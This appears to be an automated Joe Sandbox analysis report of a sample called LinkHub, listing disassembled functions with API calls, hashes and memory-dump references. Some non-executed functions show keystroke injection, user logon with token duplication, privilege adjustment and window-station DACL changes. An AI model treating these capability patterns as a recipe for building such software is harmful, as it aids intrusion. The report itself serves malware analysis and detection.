API String ID: 1385522511-0
Opcode ID: 81f157b6e98dc8e05f17db575706053a7a5d641d8a8974b7659c4b9878686ba7
Instruction ID: dcff2b45a8c3143523fd6c8e24275e8a5cb6e693572758842092a3041008c9ca
Opcode Fuzzy Hash: 81f157b6e98dc8e05f17db575706053a7a5d641d8a8974b7659c4b9878686ba7
Instruction Fuzzy Hash: BB328074A00245DFCB24DF58C884BBEBBF5EF44714F1880A9E916AB291C7B4EE45CB90

Function 00C37AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: eb77d705030e14f1f872f820fad53013e6548bc4da38a2b8cdeca8b0db3e16f4
Instruction ID: a2915d6a488dc10b25720bdd9c5a2774be801dd4196b8c2155a1c1d586198d7a
Opcode Fuzzy Hash: eb77d705030e14f1f872f820fad53013e6548bc4da38a2b8cdeca8b0db3e16f4
Instruction Fuzzy Hash: 89D13974A14209EFCB24EF98D8819FDBBB5FF48314F144199E915AB291DB70AE81CF90

Function 00BDF106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46e6a9293839ba85cedfc13775d1cb972f0c7d3ec2bd8fe3a78fe0a1c17b41da
Instruction ID: 791841d7d1e37b9657161f2ae51b0b7a36da569a36490114df2debb766bffd98
Opcode Fuzzy Hash: 46e6a9293839ba85cedfc13775d1cb972f0c7d3ec2bd8fe3a78fe0a1c17b41da
Instruction Fuzzy Hash: 0D510B35A08149AFDB10DF68C840B79BBE5EF85364F1981E9F84A9B391E731DD42CB50

Function 00BB6679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BB668B,?,?,00BB62FA,?,00000001,?,?,00000000), ref: 00BB664A
Part of subcall function 00BB663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BB665C
Part of subcall function 00BB663E: FreeLibrary.KERNEL32(00000000,?,?,00BB668B,?,?,00BB62FA,?,00000001,?,?,00000000), ref: 00BB666E

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00BB62FA,?,00000001,?,?,00000000), ref: 00BB66AB

Part of subcall function 00BB6607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BF5657,?,?,00BB62FA,?,00000001,?,?,00000000), ref: 00BB6610
Part of subcall function 00BB6607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BB6622
Part of subcall function 00BB6607: FreeLibrary.KERNEL32(00000000,?,?,00BF5657,?,?,00BB62FA,?,00000001,?,?,00000000), ref: 00BB6635

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: c1e01d69e054ce732fc4b67eb309a980cb597166393e4e64f706a486ff080111
Instruction ID: fd49bc3092d7bb8e4197b165caca590b0d9e4c922732c3291d3024020fb85d40
Opcode Fuzzy Hash: c1e01d69e054ce732fc4b67eb309a980cb597166393e4e64f706a486ff080111
Instruction Fuzzy Hash: ED11C172600205ABCB24BB64CC42BFD7BE5AF50710F1044AAF553AA1C2EEF9DE059B50

Function 00BE8782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00BE87C0

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: e22e89e6fbee4c7d24def52f8697c9a817a98029a7c0a3826c0a577a34bc0de3
Instruction ID: a49fb6d267603c80b7b5fbb7c9ffd725d19280df2915cc918e970436f195d915
Opcode Fuzzy Hash: e22e89e6fbee4c7d24def52f8697c9a817a98029a7c0a3826c0a577a34bc0de3
Instruction Fuzzy Hash: 901118B590410AAFCB05DF99E945A9E7BF8EF48310F1140A9FC09AB311DB31EE118B65

Function 00BDE972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4624603760d48ad0bd9b94422b8c27d6f3f6d6689bf5384beaeb8052d0d19255
Instruction ID: 6e25306df741937cc7af4d57816064a691e3b8be4edd27ef42df0323c52f28c7
Opcode Fuzzy Hash: 4624603760d48ad0bd9b94422b8c27d6f3f6d6689bf5384beaeb8052d0d19255
Instruction Fuzzy Hash: ABF0F932502A1056D6313A2B9C1175AB3D8CF42334F1047E7F5799B3D1FB78E8018692

Function 00BBB329 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BBB333

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: d1a5165a8b50758ee4c8222fa3177787f59c098acc0587efca672c6726628f4c
Instruction ID: 6f8ea3f498dff99271162dd1f50b656c5425dac5942b73b72df4ba5a869e8956
Opcode Fuzzy Hash: d1a5165a8b50758ee4c8222fa3177787f59c098acc0587efca672c6726628f4c
Instruction Fuzzy Hash: 26F0A4B26116056FD7149F28D806FA6FBD8EB44360F10866AFA19CB2D1EB71E5108BA4

Function 00BE3B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00BD0165,?,?,00C211D9,0000FFFF), ref: 00BE3BC5

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb0911b4113bf1749ff8bdbf86d3e2c6f50577f46aa76241cab4f478c2e436c
Instruction ID: bd38f54e73dd4465ff27b44107e36b20387c44c29d8ae921bc3a5a24b6a01b1e
Opcode Fuzzy Hash: ecb0911b4113bf1749ff8bdbf86d3e2c6f50577f46aa76241cab4f478c2e436c
Instruction Fuzzy Hash: 2FE0E531600AA166DA3037739C09F5A76CCEF41BB0F5401E1EC0797590DB20CD0082A0

Function 00BB66E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2ccdcdb4455fa0cd2fe6a2f15584f61c2b32b07645dffbe1e6ac5f7b7be02fa
Instruction ID: ad8fff472e7af169c152993ea629ac455be2e3271ca8b448c22e2d6a14cc1ac5
Opcode Fuzzy Hash: a2ccdcdb4455fa0cd2fe6a2f15584f61c2b32b07645dffbe1e6ac5f7b7be02fa
Instruction Fuzzy Hash: 56F01571505B02DFCB349F65D8A0866BBE4FF1432932489BEE6EB86610CB759C44DF50

Function 00BB684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00BB6868

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction ID: 9d6c157880a17b17176b452391cae5c01b7b872e2c9295f71ca8f45d6158fed2
Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction Fuzzy Hash: 64F0F87550020DFFDF05DF90C941EAEBBB9FB04318F248485F9159A251D376EA21ABA1

Function 00BB3907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 00BB3963

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 4e639d357029dddb7d17fb9b2dae3baed28fcf9e94ac987e8617936cec75edfa
Instruction ID: b385b6b8a7f107230a2cbd0ba26a430d530681c08d02073951d85b9b9ba68ea6
Opcode Fuzzy Hash: 4e639d357029dddb7d17fb9b2dae3baed28fcf9e94ac987e8617936cec75edfa
Instruction Fuzzy Hash: E6F06C709143549FE752DF64DC49BD97BFCA70170CF0000E5A68597291E7749B88CF55

Function 00BB3A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BB3A76

Part of subcall function 00BB8577: _wcslen.LIBCMT ref: 00BB858A

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 4e714996bb2667145f17ef4eeb09375b68c3d757b6fac9cd0f4d50ad283ab64d
Instruction ID: de79b292cf52d055c73645c608abceb8a81406819123e3aa822dc10781bf35d7
Opcode Fuzzy Hash: 4e714996bb2667145f17ef4eeb09375b68c3d757b6fac9cd0f4d50ad283ab64d
Instruction Fuzzy Hash: 47E0C276A002285BCB21A3589C06FEE77EDEFC87A0F0440B1FD09D7258DDA0ED84C690

Function 00C1E83E Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00C1E857

Part of subcall function 00BB8577: _wcslen.LIBCMT ref: 00BB858A

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: FolderPath_wcslen
String ID:
API String ID: 2987691875-0
Opcode ID: ff0408dde9f4c7aad373a74f3224899126595cbcf0d75ecfa91ebb2961530d48
Instruction ID: f84f899e51b5d5715dcfb425ffc2cc261834c6cc7402105aa8bb24092b84c80d
Opcode Fuzzy Hash: ff0408dde9f4c7aad373a74f3224899126595cbcf0d75ecfa91ebb2961530d48
Instruction Fuzzy Hash: D9D05EA69002286BDF60A674AC0DEFB3AACD740210F0006A0786DD3152ED70EE4486A0

Function 00C212EB Relevance: 1.5, APIs: 1, Instructions: 20threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_000712D1,00000000,00000000,?), ref: 00C21306

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 7fcb8e61372449752b49c9bb575fd9206053a27e8ce2c0a29363982d57e98e8b
Instruction ID: b542aa6608ab4d98a5865db1d03d677b5ee5a1bad712afa3c9c08b5b318c918c
Opcode Fuzzy Hash: 7fcb8e61372449752b49c9bb575fd9206053a27e8ce2c0a29363982d57e98e8b
Instruction Fuzzy Hash: 7CD05EB5422324BF9B2CDB51DD4ACAB769CE905661340112EB802D2D40F5A0FD00CAA0

Function 00BF071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00BF0A84,?,?,00000000,?,00BF0A84,00000000,0000000C), ref: 00BF0737

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0b56b1d66f8acae8b46c06cca0d2db31fd8b7997525825eae09ee6404a1a012e
Instruction ID: 6d33d108c62b06d2e7fd4bea3c84af18aa3f1637b18703185d585bd6bb5fb995
Opcode Fuzzy Hash: 0b56b1d66f8acae8b46c06cca0d2db31fd8b7997525825eae09ee6404a1a012e
Instruction Fuzzy Hash: A9D06C3200010DBBDF029F84DD06EDE3BAAFB48714F014000BE1856020C732E821AB90

Non-executed Functions

Function 00BCFC7C Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00BCFC86
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C0FCB8
IsIconic.USER32(00000000), ref: 00C0FCC1
ShowWindow.USER32(00000000,00000009), ref: 00C0FCCE
SetForegroundWindow.USER32(00000000), ref: 00C0FCD8
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C0FCEE
GetCurrentThreadId.KERNEL32 ref: 00C0FCF5
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C0FD01
AttachThreadInput.USER32(?,00000000,00000001), ref: 00C0FD12
AttachThreadInput.USER32(?,00000000,00000001), ref: 00C0FD1A
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00C0FD22
SetForegroundWindow.USER32(00000000), ref: 00C0FD25
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C0FD3A
keybd_event.USER32(00000012,00000000), ref: 00C0FD45
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C0FD4F
keybd_event.USER32(00000012,00000000), ref: 00C0FD54
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C0FD5D
keybd_event.USER32(00000012,00000000), ref: 00C0FD62
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C0FD6C
keybd_event.USER32(00000012,00000000), ref: 00C0FD71
SetForegroundWindow.USER32(00000000), ref: 00C0FD74
AttachThreadInput.USER32(?,000000FF,00000000), ref: 00C0FD9B

Strings

Shell_TrayWnd, xrefs: 00C0FCB3

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: b2d1a432d880a0d1434131022a733bcdb374920fa2254e6e2266b86f48da8a20
Instruction ID: 0d3f0f4e0a7824de04c32268088634fe998156695323a1664db01fedb42afe1e
Opcode Fuzzy Hash: b2d1a432d880a0d1434131022a733bcdb374920fa2254e6e2266b86f48da8a20
Instruction Fuzzy Hash: 59318175B40318BAEB307BA54C4AFBF7E6CFB45B50F110069FA06E61D0DAB05D41EAA0

Function 00C11B4D Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00C12010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C1205A
Part of subcall function 00C12010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C12087
Part of subcall function 00C12010: GetLastError.KERNEL32 ref: 00C12097

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00C11BD2
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00C11BF4
CloseHandle.KERNEL32(?), ref: 00C11C05
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C11C1D
GetProcessWindowStation.USER32 ref: 00C11C36
SetProcessWindowStation.USER32(00000000), ref: 00C11C40
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C11C5C

Part of subcall function 00C11A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C11B48), ref: 00C11A20
Part of subcall function 00C11A0B: CloseHandle.KERNEL32(?,?,00C11B48), ref: 00C11A35

Strings

default, xrefs: 00C11C57
winsta0, xrefs: 00C11C18
, xrefs: 00C11BA6

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: b00690534bb87d09adb169fc0300aac8f33eea3e8e9598bb81e419a9ccda9aed
Instruction ID: 45428fa2901c3107419bd704148e74343bcceafecb783de2fbeeff3ab8db2aa2
Opcode Fuzzy Hash: b00690534bb87d09adb169fc0300aac8f33eea3e8e9598bb81e419a9ccda9aed
Instruction Fuzzy Hash: 28819275900208AFDF11AFA4DC49FEE7BB8FF06300F184059FE15A62A0D7358A85EB50

Function 00C114AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C11A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C11A60
Part of subcall function 00C11A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C114E7,?,?,?), ref: 00C11A6C
Part of subcall function 00C11A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C114E7,?,?,?), ref: 00C11A7B
Part of subcall function 00C11A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C114E7,?,?,?), ref: 00C11A82
Part of subcall function 00C11A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C11A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C11518
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C1154C
GetLengthSid.ADVAPI32(?), ref: 00C11563
GetAce.ADVAPI32(?,00000000,?), ref: 00C1159D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C115B9
GetLengthSid.ADVAPI32(?), ref: 00C115D0
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C115D8
HeapAlloc.KERNEL32(00000000), ref: 00C115DF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C11600
CopySid.ADVAPI32(00000000), ref: 00C11607
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C11636
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C11658
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C1166A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C11691
HeapFree.KERNEL32(00000000), ref: 00C11698
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C116A1
HeapFree.KERNEL32(00000000), ref: 00C116A8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C116B1
HeapFree.KERNEL32(00000000), ref: 00C116B8
GetProcessHeap.KERNEL32(00000000,?), ref: 00C116C4
HeapFree.KERNEL32(00000000), ref: 00C116CB

Part of subcall function 00C11ADF: GetProcessHeap.KERNEL32(00000008,00C114FD,?,00000000,?,00C114FD,?), ref: 00C11AED
Part of subcall function 00C11ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C114FD,?), ref: 00C11AF4
Part of subcall function 00C11ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C114FD,?), ref: 00C11B03

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

